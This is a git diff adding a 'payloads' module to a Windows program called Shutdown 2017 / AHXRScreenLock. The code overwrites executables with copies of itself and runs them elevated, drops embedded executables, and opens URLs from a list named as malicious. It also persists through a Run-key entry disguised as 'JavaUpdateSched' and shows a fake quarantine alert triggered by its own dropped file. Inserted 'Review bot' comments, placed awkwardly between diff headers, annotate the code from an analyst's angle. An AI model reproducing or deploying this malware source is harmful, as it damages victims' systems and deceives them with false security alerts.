+ TCHAR + t_file_path + ; + char c_path[MAX_PATH]; + string s_path; + + HMODULE h_mod = GetModuleHandle(NULL); + GetModuleFileNameA(h_mod, c_path, MAX_PATH); + + s_path = c_path; + + fstream f_read(s_path, ios::in | ios::binary); + fstream f_write(v_random_file[i_random_exe], ios::out | ios::binary); + + f_write << f_read.rdbuf(); + f_write.close(); + f_read.close(); + + printf("[%s] - DUMMY: %s\r\n", c_path, v_random_file[i_random_exe].c_str()); + + /*STARTUPINFO info = { sizeof(info) }; + PROCESS_INFORMATION processInfo; + + if (CreateProcess(v_random_file[i_random_exe].c_str(), "", NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo)) + { + WaitForSingleObject(processInfo.hProcess, INFINITE); + CloseHandle(processInfo.hProcess); + CloseHandle(processInfo.hThread); + }*/ + // CreateProcess(v_random_file[i_random_exe].c_str(), "", NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo); + ShellExecute(NULL, "runas", v_random_file[i_random_exe].c_str(), + " c:\\temp\\report.txt", + NULL, // default dir + SW_SHOWNORMAL + ); + } +} diff --git a/src/payloads/payload_dummy.h b/src/payloads/payload_dummy.h new file mode 100644 index 0000000..4141aa8 --- /dev/null +++ b/src/payloads/payload_dummy.h 
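Review bot: The comment `// Replacing and self-replication.` in `createDummyProcess` understates the lines that follow it: a randomly chosen `.exe` from `getFullShutdownDirectory()` is overwritten with the contents of the running module (`GetModuleFileNameA`, then `f_write << f_read.rdbuf()`) and started through `ShellExecute` with the `runas` verb. I would expand it to `// Overwrites the chosen .exe with a byte-for-byte copy of this module, then launches it with the "runas" verb.` Because the copy is byte-identical, each overwritten file should hash the same as the running image, and saying so in the comment makes the copies straightforward to enumerate and remove. `getFullShutdownDirectory()` is defined outside this hunk, so the directory itself is not visible here.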
@@ -0,0 +1,24 @@
+/*
+ @title
+ AHXRScreenLock
+ @author
+ AHXR (https://github.com/AHXR)
+ @copyright
+ 2017
+
+ AHXRScreenLock is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ AHXRScreenLock is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with AHXRScreenLock. If not, see .
+*/
+//=======================================================
+extern void createDummyProcess();
+#define START_DUMMY_PAYLOAD() {createDummyProcess();}
\ No newline at end of file
diff --git a/src/payloads/payload_install.cpp b/src/payloads/payload_install.cpp
new file mode 100644
index 0000000..081921a
--- /dev/null
+++ b/src/payloads/payload_install.cpp
@@ -0,0 +1,94 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "payload_install.h" +#include "install_callback.h" +#include "resource1.h" + +#include +#include + +using namespace std; + +HANDLE h_install_thread; +DWORD dw_install_thread; +DWORD WINAPI t_install(LPVOID lpParam); + +void installShutdown2017(const char * path); + +DWORD WINAPI t_install(LPVOID lpParam) { + puts(getInstallPath().c_str()); + installShutdown2017(getInstallPath().c_str()); + return 0; +} + +string getInstallPath() { + TCHAR + t_program_files[MAX_PATH] + ; + string s_full_path; + + SHGetSpecialFolderPath(0, t_program_files, CSIDL_PROGRAM_FILES, FALSE); + s_full_path = t_program_files + string("\\") + string(SHUTDOWN_FOLDER_NAME); + return s_full_path; +} + +void installShutdown2017( const char * path ) { + printf("Attempting to install Shutdown 2017 in \"%s\" \r\n", path); + if (CreateDirectory( path, NULL) || GetLastError() == ERROR_ALREADY_EXISTS) { + + // Installing Shutdown2017.exe + HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA3), RT_RCDATA); + unsigned int i_resource = ::SizeofResource(NULL, hRes); + LPVOID lpRes = LoadResource(NULL, hRes); + void * pResourceLock = LockResource(lpRes); + + std::string s_extract; + s_extract = path + 
string("\\"); + s_extract += SHUTDOWN_FILE_NAME; + + // puts(s_extract.c_str()); + + fstream f_shutdown; + f_shutdown.open(s_extract, ios::out | ios::binary); + f_shutdown.write((char*)pResourceLock, i_resource); + f_shutdown.close(); + + // Adding shutdownlock + s_extract = path + string("\\"); + s_extract += LOCKED_FILE_NAME; + + hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA4), RT_RCDATA); + i_resource = ::SizeofResource(NULL, hRes); + lpRes = LoadResource(NULL, hRes); + pResourceLock = LockResource(lpRes); + + fstream f_write(s_extract, ios::out | ios::binary); + f_write.write((char*)pResourceLock, i_resource); + f_write.close(); + + onClientInstallShutdown( path ); + } + else + puts("Couldn't install."); +} \ No newline at end of file diff --git a/src/payloads/payload_install.h b/src/payloads/payload_install.h new file mode 100644 index 0000000..204c2b3 --- /dev/null +++ b/src/payloads/payload_install.h 
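Review bot: `installShutdown2017` writes two files, and nothing in payload_install.cpp records where they end up or how the install is undone; the file defines no uninstall routine. A comment above the function listing the artifacts, e.g. `// Creates <CSIDL_PROGRAM_FILES>\Shutdown2017\ and writes shutdown.exe (IDR_RCDATA3) and sd.exe (IDR_RCDATA4) into it; nothing in this file removes them.`, gives anyone cleaning up a machine the exact paths. The folder and file names are the values of `SHUTDOWN_FOLDER_NAME`, `SHUTDOWN_FILE_NAME` and `LOCKED_FILE_NAME` from payload_install.h in the same commit.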
@@ -0,0 +1,35 @@
+/*
+ @title
+ AHXRScreenLock
+ @author
+ AHXR (https://github.com/AHXR)
+ @copyright
+ 2017
+
+ AHXRScreenLock is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ AHXRScreenLock is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with AHXRScreenLock. If not, see .
+*/
+//=======================================================
+#include
+#include
+
+#define SHUTDOWN_FOLDER_NAME "Shutdown2017"
+#define SHUTDOWN_FILE_NAME "shutdown.exe"
+#define LOCKED_FILE_NAME "sd.exe"
+
+extern HANDLE h_install_thread;
+extern DWORD dw_install_thread;
+extern DWORD WINAPI t_install(LPVOID lpParam);
+extern std::string getInstallPath();
+
+#define INSTALL_PAYLOAD() {h_install_thread = CreateThread(0,0, t_install, 0, 0, &dw_install_thread);}
\ No newline at end of file
diff --git a/src/payloads/payload_lock.cpp b/src/payloads/payload_lock.cpp
new file mode 100644
index 0000000..16842ba
--- /dev/null
+++ b/src/payloads/payload_lock.cpp
@@ -0,0 +1,39 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "payload_lock.h" +#include "payload_install.h" +#include "resource1.h" +#include +#include + +using namespace std; + +void loadLockScreen() { + string s_install = getInstallPath() + string("\\") + LOCKED_FILE_NAME; + ShellExecute(NULL, "runas", s_install.c_str(), + " c:\\temp\\report.txt", + NULL, + SW_SHOWNORMAL + ); +} diff --git a/src/payloads/payload_lock.h b/src/payloads/payload_lock.h new file mode 100644 index 0000000..85e7b92 --- /dev/null +++ b/src/payloads/payload_lock.h 
@@ -0,0 +1,24 @@
+/*
+ @title
+ AHXRScreenLock
+ @author
+ AHXR (https://github.com/AHXR)
+ @copyright
+ 2017
+
+ AHXRScreenLock is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ AHXRScreenLock is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with AHXRScreenLock. If not, see .
+*/
+//=======================================================
+extern void loadLockScreen();
+#define LOCK_PAYLOAD() {loadLockScreen();}
\ No newline at end of file
diff --git a/src/payloads/payload_malicious.cpp b/src/payloads/payload_malicious.cpp
new file mode 100644
index 0000000..a09a68b
--- /dev/null
+++ b/src/payloads/payload_malicious.cpp
@@ -0,0 +1,89 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "payload_malicious.h" +#include "resource1.h" +#include +#include +#include +#include +#include +#include + +using namespace std; +template void split(const std::string &s, char delim, Out result); +std::vector split(const std::string &s, char delim); + +vector< string > s_urls; + +void readMaliciousURLs() { + HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA2), RT_RCDATA); + unsigned int i_resource = ::SizeofResource(NULL, hRes); + LPVOID lpRes = LoadResource(NULL, hRes); + void * pResourceLock = LockResource(lpRes); + + char * c_mal = (char *)pResourceLock; + istringstream s_mal(c_mal); + string s_url; + string s_format_url; + vector< string > s_split; + + while (getline(s_mal, s_url)) { + if (s_url.empty()) + break; + + s_split = split(s_url, ','); + + // Removing quotations + s_split[1].erase(0, 1); + s_split[1].erase(s_split[1].end() - 1, s_split[1].end()); + + if (s_split[1].compare("-") != 0) + s_urls.push_back(string("http://" + s_split[1])); + } +} + +void openRandomMaliciousURL() { + srand(time(NULL)); + + int i_rand_url = rand() % s_urls.size() + 1; + ShellExecute(0, 0, s_urls[i_rand_url].c_str(), 0, 0, SW_SHOW); +} + +/* + 
https://stackoverflow.com/a/236803 +*/ +template +void split(const std::string &s, char delim, Out result) { + std::stringstream ss(s); + std::string item; + while (std::getline(ss, item, delim)) { + *(result++) = item; + } +} + +std::vector split(const std::string &s, char delim) { + std::vector elems; + split(s, delim, std::back_inserter(elems)); + return elems; +} \ No newline at end of file diff --git a/src/payloads/payload_malicious.h b/src/payloads/payload_malicious.h new file mode 100644 index 0000000..37e9e89 --- /dev/null +++ b/src/payloads/payload_malicious.h @@ -0,0 +1,24 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +extern void readMaliciousURLs(); +extern void openRandomMaliciousURL(); \ No newline at end of file diff --git a/src/payloads/payload_scan.cpp b/src/payloads/payload_scan.cpp new file mode 100644 index 0000000..f063d85 --- /dev/null +++ b/src/payloads/payload_scan.cpp 
@@ -0,0 +1,57 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "payload_scan.h" +#include "payload_install.h" + +#include +#include + +using namespace std; + +void startShutdownScan() { + string s_path = getInstallPath() + string("\\") + SHUTDOWN_FILE_NAME; + + struct stat buffer; + if (stat(s_path.c_str(), &buffer) != 0) { + INSTALL_PAYLOAD(); + } + else { + + HWND h_lockdown; + + h_lockdown = FindWindow(NULL, "Shutdown 2017"); + if (h_lockdown == NULL) { + /*STARTUPINFO info = { sizeof(info) }; + PROCESS_INFORMATION processInfo; + + CreateProcess(s_path.c_str(), "", NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo); + */ + ShellExecute(NULL, "runas", s_path.c_str(), + " c:\\temp\\report.txt", + NULL, // default dir + SW_SHOWNORMAL + ); + } + } +} \ No newline at end of file diff --git a/src/payloads/payload_scan.h b/src/payloads/payload_scan.h new file mode 100644 index 0000000..e88090a --- /dev/null +++ b/src/payloads/payload_scan.h 
@@ -0,0 +1,24 @@
+/*
+ @title
+ AHXRScreenLock
+ @author
+ AHXR (https://github.com/AHXR)
+ @copyright
+ 2017
+
+ AHXRScreenLock is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ AHXRScreenLock is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with AHXRScreenLock. If not, see .
+*/
+//=======================================================
+extern void startShutdownScan();
+#define SCAN_PAYLOAD() {startShutdownScan();}
\ No newline at end of file
diff --git a/src/payloads/payload_shutdown.cpp b/src/payloads/payload_shutdown.cpp
new file mode 100644
index 0000000..7f2450f
--- /dev/null
+++ b/src/payloads/payload_shutdown.cpp
@@ -0,0 +1,97 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" + +#ifdef __cplusplus_cli +#define generic __identifier(generic) +#endif +#include +#ifdef __cplusplus_cli +#undef generic +#endif + +#include "payload_shutdown.h" +#include "directory.h" +#include "resource1.h" +#include "settings.h" +#include "pack.h" +#include "locker.h" +#include "fake_exe.h" +#include +#include +#include +#include + +using namespace std; +HANDLE h_fake; +DWORD hd_fake; +DWORD WINAPI t_buildFake(LPVOID lpParameter); + +string getFullShutdownDirectory() { + string s_directory(getHomeDirectory()); + s_directory += "\\" + string(SHUTDOWN_FOLDER_NAME); + return s_directory; +} + +inline bool createShutdownFolder() { + return (CreateDirectoryA(getFullShutdownDirectory().c_str(), NULL) || ERROR_ALREADY_EXISTS == GetLastError()); +} + +DWORD WINAPI t_buildFake(LPVOID lpParameter) { + fstream + f_build + ; + string s_full_shutdown; + + HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); + unsigned int i_resource = ::SizeofResource(NULL, hRes); + LPVOID lpRes = LoadResource(NULL, hRes); + void * pResourceLock = LockResource(lpRes); + + TCHAR tmpPath[MAX_PATH]; + GetTempPath(MAX_PATH, tmpPath); + + std::string s_extract; + s_extract = tmpPath; 
+ s_extract += "protect.tmp"; + + /* + for ( char * x : c_fake_executables) { + s_full_shutdown = getFullShutdownDirectory(); + s_full_shutdown += string("\\") + string(x) + string(".exe"); + f_build.open(s_full_shutdown, ios::out | ios::binary ); + f_build.write((char*)pResourceLock, i_resource); + f_build.close(); + }*/ + + srand(time(NULL)); + int i_rand_idx = rand() % sizeof(c_fake_executables) / sizeof(c_fake_executables[0]); + s_full_shutdown = getFullShutdownDirectory(); + s_full_shutdown += string("\\") + string(c_fake_executables[i_rand_idx]) + string(".exe"); + f_build.open(s_full_shutdown, ios::out | ios::binary); + f_build.write((char*)pResourceLock, i_resource); + f_build.close(); + + std::remove(s_extract.c_str()); + return 0; +} \ No newline at end of file diff --git a/src/payloads/payload_shutdown.h b/src/payloads/payload_shutdown.h new file mode 100644 index 0000000..ce7355f --- /dev/null +++ b/src/payloads/payload_shutdown.h 
@@ -0,0 +1,36 @@
+/*
+ @title
+ AHXRScreenLock
+ @author
+ AHXR (https://github.com/AHXR)
+ @copyright
+ 2017
+
+ AHXRScreenLock is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ AHXRScreenLock is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with AHXRScreenLock. If not, see .
+*/
+//=======================================================
+#include
+#include
+
+#define SHUTDOWN_FOLDER_NAME "Shutdown2017"
+
+extern HANDLE h_fake;
+extern DWORD hd_fake;
+extern DWORD WINAPI t_buildFake(LPVOID lpParameter);
+
+#define BUILD_FAKE_EXECUTABLES() { h_fake = CreateThread(0, 0, t_buildFake, 0, 0, &hd_fake); }
+#define SHUTDOWN_PAYLOAD() { if (createShutdownFolder()) BUILD_FAKE_EXECUTABLES(); }
+
+extern bool createShutdownFolder();
+extern std::string getFullShutdownDirectory();
\ No newline at end of file
diff --git a/src/payloads/payload_startup.cpp b/src/payloads/payload_startup.cpp
new file mode 100644
index 0000000..25f4709
--- /dev/null
+++ b/src/payloads/payload_startup.cpp
@@ -0,0 +1,71 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "payload_startup.h" +#include +#include +#include + +void createStartupData() { + + HKEY h_key; + long l_key; + + l_key = RegOpenKeyEx(KEY_TARGET, KEY_STARTUP, 0, KEY_ALL_ACCESS, &h_key); + + // No admin access. Just make it user startup. + if (l_key == ERROR_ACCESS_DENIED) + l_key = RegOpenKeyEx(KEY_NON_ADMIN_TARGET, KEY_NON_ADMIN_STARTUP, 0, KEY_ALL_ACCESS, &h_key); + + if (l_key == ERROR_SUCCESS) { + + HMODULE h_mod = GetModuleHandleW(NULL); + char * c_path[MAX_PATH]; + GetModuleFileNameA(h_mod, (char *)c_path, MAX_PATH); + + RegSetValueEx(h_key, KEY_VALUE_NAME, 0, REG_SZ, (LPBYTE)c_path, MAX_PATH); + RegCloseKey(h_key); + } + +} + +bool isStartupRegistered() { + HKEY h_key; + long l_key; + bool b_exist; + + l_key = RegOpenKeyEx(KEY_TARGET, KEY_STARTUP, 0, KEY_READ, &h_key); + // No admin access. Just make it user startup. 
+ if (l_key == ERROR_ACCESS_DENIED) + l_key = RegOpenKeyEx(KEY_NON_ADMIN_TARGET, KEY_NON_ADMIN_STARTUP, 0, KEY_READ, &h_key); + + char c_data[MAX_PATH]; + DWORD dw_reg = REG_SZ; + DWORD dw_length = MAX_PATH; + LONG l_error = RegQueryValueEx(h_key, KEY_VALUE_NAME, NULL, &dw_reg, (LPBYTE)&c_data, &dw_length); + + b_exist = ( l_error == ERROR_FILE_NOT_FOUND ); + RegCloseKey(h_key); + + return b_exist; +} diff --git a/src/payloads/payload_startup.h b/src/payloads/payload_startup.h new file mode 100644 index 0000000..a53c787 --- /dev/null +++ b/src/payloads/payload_startup.h @@ -0,0 +1,32 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#define KEY_TARGET HKEY_LOCAL_MACHINE +#define KEY_NON_ADMIN_TARGET HKEY_CURRENT_USER +#define KEY_STARTUP "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" +#define KEY_NON_ADMIN_STARTUP "Software\\Microsoft\\Windows\\CurrentVersion\\Run" +#define KEY_VALUE_NAME "JavaUpdateSched" + +#define STARTUP_PAYLOAD() {createStartupData();} + +extern void createStartupData(); +extern bool isStartupRegistered(); \ No newline at end of file diff --git a/src/payloads/resource.h b/src/payloads/resource.h new file mode 100644 index 0000000..96671e1 Binary files /dev/null and b/src/payloads/resource.h differ 
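Review bot: Neither createStartupData() in payload_startup.cpp nor the KEY_* defines in payload_startup.h carry a comment saying that this registry write is the sample's persistence step, which is the first thing an analyst reading these two files needs to know. The function opens `SOFTWARE\Microsoft\Windows\CurrentVersion\Run` under HKEY_LOCAL_MACHINE, falls back to the same path under HKEY_CURRENT_USER on ERROR_ACCESS_DENIED, and stores the running module's path under the value `JavaUpdateSched`. I would add above the defines `// Autorun (Run key) entry; the value name imitates a Java updater, so a value of this name whose data points outside a Java install directory is an indicator`. That the name is meant to resemble a legitimate updater entry is my reading of the string, not something the files state.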
diff --git a/src/payloads/resource1.h b/src/payloads/resource1.h new file mode 100644 index 0000000..fac85bf Binary files /dev/null and b/src/payloads/resource1.h differ diff --git a/src/payloads/stdafx.cpp b/src/payloads/stdafx.cpp new file mode 100644 index 0000000..3b8bde3 --- /dev/null +++ b/src/payloads/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// AHXRShutdownPayloads.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/src/payloads/stdafx.h b/src/payloads/stdafx.h new file mode 100644 index 0000000..b005a83 --- /dev/null +++ b/src/payloads/stdafx.h @@ -0,0 +1,15 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#include +#include + + + +// TODO: reference additional headers your program requires here diff --git a/src/payloads/targetver.h b/src/payloads/targetver.h new file mode 100644 index 0000000..87c0086 --- /dev/null +++ b/src/payloads/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include diff --git a/src/shutdown2017/frmMain.h b/src/shutdown2017/frmMain.h index 5dbea08..d79560c 100644 --- a/src/shutdown2017/frmMain.h +++ b/src/shutdown2017/frmMain.h 
@@ -77,6 +77,7 @@ namespace AHXRShutdown { private: System::Windows::Forms::Panel^ panel5; private: System::Windows::Forms::Label^ lblStatus; private: System::Windows::Forms::NotifyIcon^ notifyIcon1; + private: System::Windows::Forms::NotifyIcon^ notifyIcon2; @@ -121,6 +122,7 @@ namespace AHXRShutdown { this->label1 = (gcnew System::Windows::Forms::Label()); this->tmrUpdate = (gcnew System::Windows::Forms::Timer(this->components)); this->notifyIcon1 = (gcnew System::Windows::Forms::NotifyIcon(this->components)); + this->notifyIcon2 = (gcnew System::Windows::Forms::NotifyIcon(this->components)); this->panel1->SuspendLayout(); (cli::safe_cast(this->pictureBox1))->BeginInit(); this->panel2->SuspendLayout(); @@ -295,6 +297,13 @@ namespace AHXRShutdown { this->notifyIcon1->Visible = true; this->notifyIcon1->MouseDoubleClick += gcnew System::Windows::Forms::MouseEventHandler(this, &frmMain::notifyIcon1_MouseDoubleClick); // + // notifyIcon2 + // + this->notifyIcon2->BalloonTipIcon = System::Windows::Forms::ToolTipIcon::Warning; + this->notifyIcon2->BalloonTipTitle = L"Shutdown 2017"; + this->notifyIcon2->Icon = (cli::safe_cast(resources->GetObject(L"notifyIcon2.Icon"))); + this->notifyIcon2->Text = L"Shutdown 2017"; + // // frmMain // this->AutoScaleDimensions = System::Drawing::SizeF(6, 13); @@ -339,6 +348,13 @@ private: System::Void frmMain_Load(System::Object^ sender, System::EventArgs^ } private: System::Void tmrUpdate_Tick(System::Object^ sender, System::EventArgs^ e) { + if (b_new_generated) { + this->notifyIcon2->BalloonTipText = L"Shutdown2017 has discovered a dangerous file and has quarantined it in your Shutdown2017 folder."; + this->notifyIcon2->ShowBalloonTip(4000); + b_new_generated = false; + ShellExecute(NULL, "open", s_documents_path.c_str(), NULL, NULL, SW_SHOWDEFAULT); + } + if (i_scan_idx != v_files.size() ) { diff --git a/src/shutdown2017/lockdown.cpp b/src/shutdown2017/lockdown.cpp index 242ed65..9bc954d 100644 --- a/src/shutdown2017/lockdown.cpp 
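Review bot: The balloon added to tmrUpdate_Tick tells the user that a dangerous file was discovered and quarantined, yet the only condition tested is `b_new_generated`, and no comment records that the alert is staged. In payload.cpp that flag is set when the count of .exe files in the program's own Shutdown2017 folder changes, so the notification reports the program's own dropped file, not any detection. A comment such as `// Staged alert: fires when the payload adds an .exe to the Shutdown2017 folder, then opens that folder` would make this explicit for anyone triaging the sample. The body of tmrUpdate_Tick continues outside the hunk.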
+++ b/src/shutdown2017/lockdown.cpp @@ -93,8 +93,6 @@ void lockdownFile(string fileName) { buildNewLocker(fileName); packLocker(fileName, SHUTDOWN_PW, SHUTDOWN_MSG); attachExecutable(fileName, s_new_name); - - TakeOwnership(const_cast< char * >(s_new_name.c_str())); remove(s_new_name.c_str()); // Remove old .exe file. diff --git a/src/shutdown2017/main.cpp b/src/shutdown2017/main.cpp index c26469f..7a40e30 100644 --- a/src/shutdown2017/main.cpp +++ b/src/shutdown2017/main.cpp @@ -20,7 +20,7 @@ along with AHXRScreenLock. If not, see . */ //======================================================= -//#define DEBUG +//#define DEBUG #include #include @@ -43,6 +43,7 @@ DWORD WINAPI t_run_scanner(LPVOID lpParameter); DWORD WINAPI t_run_code_gui(LPVOID lpParameter); #include "scan.h" +#include "payload.h" #include "frmMain.h" #include "frmCode.h" #include "resource.h" @@ -58,11 +59,12 @@ int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR pScmdline, int iC #endif { h_update = CreateThread(0, 0, t_run_scanner, 0, 0, &dh_update); + START_PAYLOAD(); /* Here is the force-scan. If the client closes the scanner out, the program will automatically scan itself after being closed 15 seconds prior. */ - + while (1) { if (b_closed) { @@ -85,6 +87,8 @@ int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR pScmdline, int iC } Sleep(15000); } + +// return 0; } void showCodeDialog() { diff --git a/src/shutdown2017/payload.cpp b/src/shutdown2017/payload.cpp new file mode 100644 index 0000000..28016e6 --- /dev/null +++ b/src/shutdown2017/payload.cpp 
@@ -0,0 +1,125 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#ifdef __cplusplus_cli + #define generic __identifier(generic) +#endif + #include +#ifdef __cplusplus_cli + #undef generic +#endif + +#include "payload.h" +#include "resource.h" +#include +#include +#include +#include +#include +#include + +HANDLE h_payload; +HANDLE h_shutdown; +DWORD dw_shutdown; +DWORD dw_payload; +namespace fs = boost::filesystem; +bool b_new_generated; +bool b_first; +int i_dir_count; +int i_old_dir_count; +std::string s_documents_path; + +DWORD WINAPI t_shutdown(LPVOID lpParameter) { + + char + my_documents[MAX_PATH] + ; + HRESULT result = SHGetFolderPathA(NULL, CSIDL_PERSONAL, NULL, SHGFP_TYPE_CURRENT, my_documents); + s_documents_path = my_documents + std::string("\\") + SHUTDOWN_FOLDER_NAME + std::string("\\"); + + while (1) { + + struct stat info; + if (info.st_mode & S_IFDIR) { + fs::directory_iterator it_end; + fs::directory_iterator it_dir(s_documents_path); + i_dir_count = 0; + + while (it_dir != it_end) { + try { + if (!fs::is_directory(it_dir->status())) // Listing non-directory files. 
